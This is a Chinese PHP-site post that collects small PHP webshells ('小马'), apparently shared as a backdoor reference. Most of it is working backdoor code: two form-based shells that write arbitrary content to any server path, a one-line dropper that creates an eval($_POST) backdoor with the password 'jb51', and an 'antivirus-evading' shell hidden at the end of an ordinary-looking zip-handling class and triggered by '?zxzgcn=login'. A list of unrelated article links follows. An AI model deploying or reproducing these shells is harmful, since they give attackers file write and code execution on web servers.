超小PHP小马小结(方便查找后门的朋友)


Posted in PHP onMay 05, 2012

作者: spider
我也来个超小PHP小马

<?php 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
保存文件名: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="保存"> 
<form> 
<?php 
if(isset($_POST['file'])) 
{ 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? '保存成功!' : '保存失败!'; 
@fclose($fp); 
} 
?>

昨晚无聊看了会 php 的教程,发现php真是相当的强大啊!顺便写了个php小马
下面直接贴代码了。。
<html> 
<title >By: SinCoder</title> 
<font color=red size=6>php小马 By:SinCoder</br></font> 
<? echo "</br>本程序的路径: ".__FILE__. 
"</br>服务器操作系统: ".PHP_OS. 
"</br>服务器IP地址: ".gethostbyname($_SERVER["SERVER_NAME"]). 
"</br>PHP版本: ".PHP_VERSION; 
?> 
<form action = <? echo strrchr(__FILE__,"\\"); ?> method="post"> 
要提交的数据:</br> 
<textarea type="text" name="data" rows="10" cols="30"> 
</textarea> 
</br> 
保存路径:<input type="text" name="dir" /> 
</br> 
<input type="submit" value="提交"/> 
</form> 
</html> 
<? 
if(!(isset($_POST["data"]) && isset($_POST["dir"]))) 
exit(); 
if(strlen($_POST["data"])>0 && strlen($_POST["dir"])>0) 
{ 
$p_File=fopen($_POST["dir"],"a"); 
if(!$p_File) 
echo "写入失败!请换个目录试试!"; 
else 
echo "Ok!! "; 
fputs($p_File,$_POST["data"]); 
fclose($p_File); 
} 
else 
echo "请把数据填写完整!"; 
?>

php一句话小马的后门
<?fputs(fopen(jb51.php,w),<?eval($_POST[jb51]);?>)?>

这样访问之后,在当前目录生成jb51.php 内容为 <?eval($_POST[jb51]);?>)?> 的一句话小马,密码为 jb51
最新免杀php小马
<?php 
class zip 
{ 
var $datasec, $ctrl_dir = array(); 
var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00"; 
var $old_offset = 0; var $dirs = Array("."); 
function get_List($zip_name) 
{ 
$ret = ''; 
$zip = @fopen($zip_name, 'rb'); 
if(!$zip) return(0); 
$centd = $this->ReadCentralDir($zip,$zip_name); 
@rewind($zip); 
@fseek($zip, $centd['offset']); 
for ($i=0; $i<$centd['entries']; $i++) 
{ 
$header = $this->ReadCentralFileHeaders($zip); 
$header['index'] = $i;$info['filename'] = $header['filename']; 
$info['stored_filename'] = $header['stored_filename']; 
$info['size'] = $header['size'];$info['compressed_size']=$header['compressed_size']; 
$info['crc'] = strtoupper(dechex( $header['crc'] )); 
$info['mtime'] = $header['mtime']; $info['comment'] = $header['comment']; 
$info['folder'] = ($header['external']==0x41FF0010||$header['external']==16)?1:0; 
$info['index'] = $header['index'];$info['status'] = $header['status']; 
$ret[]=$info; unset($header); 
} 
return $ret; 
} 
function Add($files,$compact) 
{ 
if(!is_array($files[0])) $files=Array($files); 
for($i=0;$files[$i];$i++){ 
$fn = $files[$i]; 
if(!in_Array(dirname($fn[0]),$this->dirs)) 
$this->add_Dir(dirname($fn[0])); 
if(basename($fn[0])) 
$ret[basename($fn[0])]=$this->add_File($fn[1],$fn[0],$compact); 
} 
return $ret; 
} 
function get_file() 
{ 
$data = implode('', $this -> datasec); 
$ctrldir = implode('', $this -> ctrl_dir); 
return $data . $ctrldir . $this -> eof_ctrl_dir . 
pack('v', sizeof($this -> ctrl_dir)).pack('v', sizeof($this -> ctrl_dir)). 
pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00"; 
} 
function add_dir($name) 
{ 
$name = str_replace("\\", "/", $name); 
$fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
$fr .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
$fr .= pack("v", 0 ).$name.pack("V", 0).pack("V", 0).pack("V", 0); 
$this -> datasec[] = $fr; 
$new_offset = strlen(implode("", $this->datasec)); 
$cdrec = "\x50\x4b\x01\x02\x00\x00\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00"; 
$cdrec .= pack("V",0).pack("V",0).pack("V",0).pack("v", strlen($name) ); 
$cdrec .= pack("v", 0 ).pack("v", 0 ).pack("v", 0 ).pack("v", 0 ); 
$ext = "\xff\xff\xff\xff"; 
$cdrec .= pack("V", 16 ).pack("V", $this -> old_offset ).$name; 
$this -> ctrl_dir[] = $cdrec; 
$this -> old_offset = $new_offset; 
$this -> dirs[] = $name; 
} 
function add_File($data, $name, $compact = 1) 
{ 
$name = str_replace('\\', '/', $name); 
$dtime = dechex($this->DosTime()); 
$hexdtime = '\x' . $dtime[6] . $dtime[7].'\x'.$dtime[4] . $dtime[5] 
. '\x' . $dtime[2] . $dtime[3].'\x'.$dtime[0].$dtime[1]; 
eval('$hexdtime = "' . $hexdtime . '";'); 
if($compact) 
$fr = "\x50\x4b\x03\x04\x14\x00\x00\x00\x08\x00".$hexdtime; 
else $fr = "\x50\x4b\x03\x04\x0a\x00\x00\x00\x00\x00".$hexdtime; 
$unc_len = strlen($data); $crc = crc32($data); 
if($compact){ 
$zdata = gzcompress($data); $c_len = strlen($zdata); 
$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2); 
}else{ 
$zdata = $data; 
} 
$c_len=strlen($zdata); 
$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$fr .= pack('v', strlen($name)).pack('v', 0).$name.$zdata; 
$fr .= pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$this -> datasec[] = $fr; 
$new_offset = strlen(implode('', $this->datasec)); 
if($compact) 
$cdrec = "\x50\x4b\x01\x02\x00\x00\x14\x00\x00\x00\x08\x00"; 
else $cdrec = "\x50\x4b\x01\x02\x14\x00\x0a\x00\x00\x00\x00\x00"; 
$cdrec .= $hexdtime.pack('V', $crc).pack('V', $c_len).pack('V', $unc_len); 
$cdrec .= pack('v', strlen($name) ).pack('v', 0 ).pack('v', 0 ); 
$cdrec .= pack('v', 0 ).pack('v', 0 ).pack('V', 32 ); 
$cdrec .= pack('V', $this -> old_offset ); 
$this -> old_offset = $new_offset; 
$cdrec .= $name; 
$this -> ctrl_dir[] = $cdrec; 
return true; 
} 
function DosTime() { 
$timearray = getdate(); 
if ($timearray['year'] < 1980) { 
$timearray['year'] = 1980; $timearray['mon'] = 1; 
$timearray['mday'] = 1; $timearray['hours'] = 0; 
$timearray['minutes'] = 0; $timearray['seconds'] = 0; 
} 
return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) | ($timearray['hours'] << 11) | 
($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1); 
} 
//解压整个压缩包 
//直接用 Extract 会有路径问题,本函数先从列表中获得文件信息并创建好所有目录然后才运行 Extract 
function ExtractAll ( $zn, $to) 
{ 
if(substr($to,-1)!="/") $to .= "/"; 
$files = $this->get_List($zn); 
$cn = count($files); 
if(is_array($files)) 
{ 
for($i=0;$i<$cn;$i++) 
{ 
if($files[$i]['folder']==1){ 
@mkdir($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); 
@chmod($to.$files[$i]['filename'],$GLOBALS['cfg_dir_purview']); 
} 
} 
} 
$this->Extract ($zn,$to); 
} 
function Extract ( $zn, $to, $index = Array(-1) ) 
{ 
$ok = 0; $zip = @fopen($zn,'rb'); 
if(!$zip) return(-1); 
$cdir = $this->ReadCentralDir($zip,$zn); 
$pos_entry = $cdir['offset']; 
if(!is_array($index)){ $index = array($index); } 
for($i=0; isset($index[$i]);$i++){ 
if(intval($index[$i])!=$index[$i]||$index[$i]>$cdir['entries']) 
return(-1); 
} 
for ($i=0; $i<$cdir['entries']; $i++) 
{ 
@fseek($zip, $pos_entry); 
$header = $this->ReadCentralFileHeaders($zip); 
$header['index'] = $i; $pos_entry = ftell($zip); 
@rewind($zip); fseek($zip, $header['offset']); 
if(in_array("-1",$index)||in_array($i,$index)) 
$stat[$header['filename']]=$this->ExtractFile($header, $to, $zip); 
} 
fclose($zip); 
return $stat; 
} 
function ReadFileHeader($zip) 
{ 
$binary_data = fread($zip, 30); 
$data = unpack('vchk/vid/vversion/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len', $binary_data); 
$header['filename'] = fread($zip, $data['filename_len']); 
if ($data['extra_len'] != 0) { 
$header['extra'] = fread($zip, $data['extra_len']); 
} else { $header['extra'] = ''; } 
$header['compression'] = $data['compression'];$header['size'] = $data['size']; 
$header['compressed_size'] = $data['compressed_size']; 
$header['crc'] = $data['crc']; $header['flag'] = $data['flag']; 
$header['mdate'] = $data['mdate'];$header['mtime'] = $data['mtime']; 
if ($header['mdate'] && $header['mtime']){ 
$hour=($header['mtime']&0xF800)>>11;$minute=($header['mtime']&0x07E0)>>5; 
$seconde=($header['mtime']&0x001F)*2;$year=(($header['mdate']&0xFE00)>>9)+1980; 
$month=($header['mdate']&0x01E0)>>5;$day=$header['mdate']&0x001F; 
$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); 
}else{$header['mtime'] = time();} 
$header['stored_filename'] = $header['filename']; 
$header['status'] = "ok"; 
return $header; 
} 
function ReadCentralFileHeaders($zip){ 
$binary_data = fread($zip, 46); 
$header = unpack('vchkid/vid/vversion/vversion_extracted/vflag/vcompression/vmtime/vmdate/Vcrc/Vcompressed_size/Vsize/vfilename_len/vextra_len/vcomment_len/vdisk/vinternal/Vexternal/Voffset', $binary_data); 
if ($header['filename_len'] != 0) 
$header['filename'] = fread($zip,$header['filename_len']); 
else $header['filename'] = ''; 
if ($header['extra_len'] != 0) 
$header['extra'] = fread($zip, $header['extra_len']); 
else $header['extra'] = ''; 
if ($header['comment_len'] != 0) 
$header['comment'] = fread($zip, $header['comment_len']); 
else $header['comment'] = ''; 
if ($header['mdate'] && $header['mtime']) 
{ 
$hour = ($header['mtime'] & 0xF800) >> 11; 
$minute = ($header['mtime'] & 0x07E0) >> 5; 
$seconde = ($header['mtime'] & 0x001F)*2; 
$year = (($header['mdate'] & 0xFE00) >> 9) + 1980; 
$month = ($header['mdate'] & 0x01E0) >> 5; 
$day = $header['mdate'] & 0x001F; 
$header['mtime'] = mktime($hour, $minute, $seconde, $month, $day, $year); 
} else { 
$header['mtime'] = time(); 
} 
$header['stored_filename'] = $header['filename']; 
$header['status'] = 'ok'; 
if (substr($header['filename'], -1) == '/') 
$header['external'] = 0x41FF0010; 
return $header; 
} 
function ReadCentralDir($zip,$zip_name) 
{ 
$size = filesize($zip_name); 
if ($size < 277) $maximum_size = $size; 
else $maximum_size=277; 
@fseek($zip, $size-$maximum_size); 
$pos = ftell($zip); $bytes = 0x00000000; 
while ($pos < $size) 
{ 
$byte = @fread($zip, 1); $bytes=($bytes << 8) | Ord($byte); 
if ($bytes == 0x504b0506){ $pos++; break; } $pos++; 
} 
$data = @unpack('vdisk/vdisk_start/vdisk_entries/ventries/Vsize/Voffset/vcomment_size',fread($zip, 18)); 
if ($data['comment_size'] != 0) $centd['comment'] = fread($zip, $data['comment_size']); 
else $centd['comment'] = ''; $centd['entries'] = $data['entries']; 
$centd['disk_entries'] = $data['disk_entries']; 
$centd['offset'] = $data['offset'];$centd['disk_start'] = $data['disk_start']; 
$centd['size'] = $data['size']; $centd['disk'] = $data['disk']; 
return $centd; 
} 
function ExtractFile($header,$to,$zip) 
{ 
$header = $this->readfileheader($zip); 
$header['external'] = (!isset($header['external']) ? 0 : $header['external']); 
if(substr($to,-1)!="/") $to.="/"; 
if(!@is_dir($to)) @mkdir($to,$GLOBALS['cfg_dir_purview']); 
if (!($header['external']==0x41FF0010)&&!($header['external']==16)) 
{ 
if ($header['compression']==0) 
{ 
$fp = @fopen($to.$header['filename'], 'wb'); 
if(!$fp) return(-1); 
$size = $header['compressed_size']; 
while ($size != 0) 
{ 
$read_size = ($size < 2048 ? $size : 2048); 
$buffer = fread($zip, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
fclose($fp); 
touch($to.$header['filename'], $header['mtime']); 
}else{ 
$fp = @fopen($to.$header['filename'].'.gz','wb'); 
if(!$fp) return(-1); 
$binary_data = pack('va1a1Va1a1', 0x8b1f, Chr($header['compression']), 
Chr(0x00), time(), Chr(0x00), Chr(3)); 
fwrite($fp, $binary_data, 10); 
$size = $header['compressed_size']; 
while ($size != 0) 
{ 
$read_size = ($size < 1024 ? $size : 1024); 
$buffer = fread($zip, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
$binary_data = pack('VV', $header['crc'], $header['size']); 
fwrite($fp, $binary_data,8); fclose($fp); 
$gzp = @gzopen($to.$header['filename'].'.gz','rb') or die("Cette archive est compress"); 
if(!$gzp) return(-2); 
$fp = @fopen($to.$header['filename'],'wb'); 
if(!$fp) return(-1); 
$size = $header['size']; 
while ($size != 0) 
{ 
$read_size = ($size < 2048 ? $size : 2048); 
$buffer = gzread($gzp, $read_size); 
$binary_data = pack('a'.$read_size, $buffer); 
@fwrite($fp, $binary_data, $read_size); 
$size -= $read_size; 
} 
fclose($fp); gzclose($gzp); 
touch($to.$header['filename'], $header['mtime']); 
@unlink($to.$header['filename'].'.gz'); 
}} 
return true; 
} 
} 
if($_GET['zxzgcn']=='login'){ 
header("content-Type: text/html; charset=gb2312"); 
if(get_magic_quotes_gpc()) foreach($_POST as $k=>$v) $_POST[$k] = stripslashes($v); 
?> 
<form method="POST"> 
save to: <input type="text" name="file" size="60" value="<? echo str_replace('\\','/',__FILE__) ?>"> 
<br><br> 
<textarea name="text" COLS="70" ROWS="18" ></textarea> 
<br><br> 
<input type="submit" name="submit" value="save"> 
<form> 
<?php 
if(isset($_POST['file'])) 
{ 
$fp = @fopen($_POST['file'],'wb'); 
echo @fwrite($fp,$_POST['text']) ? 'succed!' : 'faled!'; 
@fclose($fp); 
} 
} 
?>

用法xxx.php?zxzgcn=login
PHP 相关文章推荐
snoopy PHP版的网络客户端提供本地下载
Apr 15 PHP
遍历指定目录下的所有目录和文件的php代码
Nov 27 PHP
php获得url参数中具有&amp;的值的方法
Mar 05 PHP
PHP中使用json数据格式定义字面量对象的方法
Aug 20 PHP
ThinkPHP分页实例
Oct 15 PHP
php之curl实现http与https请求的方法
Oct 21 PHP
php上传文件并存储到mysql数据库的方法
Mar 16 PHP
php简单判断文本编码的方法
Jul 30 PHP
php中define用法实例
Jul 30 PHP
基于laravel制作APP接口(API)
Mar 15 PHP
php魔术方法功能与用法实例分析
Oct 19 PHP
使用laravel根据用户类型来显示或隐藏字段
Oct 17 PHP
apache mysql php 源码编译使用方法
May 03 #PHP
几个有用的php字符串过滤,转换函数代码
May 01 #PHP
PHP 基于文件头的文件类型验证类函数
May 01 #PHP
PHP 第三节 变量介绍
Apr 28 #PHP
PHP 第二节 数据类型之转换
Apr 28 #PHP
PHP 第二节 数据类型之数组
Apr 28 #PHP
PHP 第二节 数据类型之字符串类型
Apr 28 #PHP
You might like
PHP集成FCK的函数代码
2008/09/27 PHP
PHP 输出简单动态WAP页面
2009/06/09 PHP
PHP使用递归按层级查找数据的方法
2019/11/10 PHP
extjs 学习笔记(二) Ext.Element类
2009/10/13 Javascript
基于MVC3方式实现下拉列表联动(JQuery)
2013/09/02 Javascript
js window.open弹出新的网页窗口
2014/01/16 Javascript
jQuery移动web开发中的页面初始化与加载事件
2015/12/03 Javascript
JavaScript中Window对象的属性及事件
2015/12/25 Javascript
js数组常用操作方法小结(增加,删除,合并,分割等)
2016/08/02 Javascript
如何使用Bootstrap创建表单
2017/03/29 Javascript
React中使用collections时key的重要性详解
2017/08/07 Javascript
Angular在模板驱动表单中自定义校验器的方法
2017/08/09 Javascript
js编写简单的聊天室功能
2017/08/17 Javascript
vue element-ui 绑定@keyup事件无效的解决方法
2018/03/09 Javascript
webpack 从指定入口文件中提取公共文件的方法
2018/11/13 Javascript
详解js常用分割取字符串的方法
2019/05/15 Javascript
python使用PIL缩放网络图片并保存的方法
2015/04/24 Python
python对象及面向对象技术详解
2016/07/19 Python
pandas.DataFrame 根据条件新建列并赋值的方法
2018/04/08 Python
解决已经安装requests,却依然提示No module named requests问题
2018/05/18 Python
python3 flask实现文件上传功能
2020/03/20 Python
使用Python处理BAM的方法
2018/09/28 Python
python之pymysql模块简单应用示例代码
2019/12/16 Python
python 实现非极大值抑制算法(Non-maximum suppression, NMS)
2020/10/15 Python
Pycharm 解决自动格式化冲突的设置操作
2021/01/15 Python
欧克利英国官网:Oakley英国
2019/08/24 全球购物
网络工程系信息安全技术专业大学生求职信
2013/10/22 职场文书
高中生班主任评语
2014/04/25 职场文书
小学生学雷锋演讲稿
2014/04/25 职场文书
建设工地安全标语
2014/06/07 职场文书
奉献家乡演讲稿
2014/09/13 职场文书
开展党的群众路线教育实践活动个人对照检查材料
2014/11/05 职场文书
2015年测量员工作总结
2015/05/23 职场文书
重阳节座谈会主持词
2015/07/03 职场文书
python cv2图像质量压缩的算法示例
2021/06/04 Python
Win11怎么添加用户?Win11添加用户账户的方法
2022/07/15 数码科技